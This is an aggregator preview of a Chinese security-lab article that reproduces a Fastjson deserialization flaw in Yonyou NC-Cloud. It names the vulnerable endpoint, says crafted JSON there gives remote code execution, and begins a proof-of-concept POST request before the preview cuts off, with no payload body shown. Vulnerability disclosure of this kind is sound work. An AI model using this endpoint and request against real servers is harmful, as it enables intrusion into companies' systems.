今天看啥  ›  专栏  ›  弥天安全实验室

【成功复现】用友NC-Cloud系统反序列化漏洞(Fastjson)

弥天安全实验室  · 公众号  ·  · 2024-09-25 08:57
    

文章预览

网安引领时代,弥天点亮未来       0x00写在前面 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 0x01漏洞介绍 用友NC Cloud是用友网络科技股份有限公司推出的一款企业级云服务产品,主要面向大中型企业提供全面的云计算解决方案。 用友NC-Cloud /ncchr/pm/ref/indiIssued/blobRefClassSearch接口处存在FastJson反序列漏洞。攻击者可以构造恶意的JSON数据,在服务器上执行任意代码,从而控制整个服务器系统。 0x02影响版本 用友-NC-Cloud 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现   Poc (POST) POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1 Host : 127.0.0.1 Content-Type : application/json Connection : close Cache-Control : max-age=0 Upgrade-Insecure-Requests : 1 Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览